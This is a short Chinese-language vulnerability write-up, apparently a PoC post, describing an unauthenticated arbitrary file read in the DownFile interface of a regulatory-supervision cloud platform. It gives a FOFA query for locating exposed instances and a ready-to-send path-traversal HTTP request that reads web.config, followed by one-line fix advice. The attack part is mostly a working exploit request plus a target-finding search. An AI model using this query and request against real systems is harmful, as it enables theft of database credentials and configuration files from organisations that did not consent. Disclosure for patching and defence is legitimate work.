0x01 产品简介
综合监管云平台是一种集成了多种先进技术的信息化平台,旨在通过数据采集、分析、预警和应急处理等功能,实现对各类监管对象的全面、高效、精准管理,综合监管云平台利用“互联网+物联网”模式,结合云计算、大数据、边缘计算等先进技术,构建了一个集数据采集、统计分析、监管预警、应急安全等功能于一体的信息化监管平台。该平台通过远程实时数据采集技术,实现对监管对象的实时监控和动态管理,为监管部门提供强有力的技术支持和决策依据。
0x02 漏洞概述
综合监管云平台 DownFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:body="/Download/DownFile?fileName=SetUp.exe"
0x04 漏洞复现
PoC
GET /Download/DownFile?fileName=../web.config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
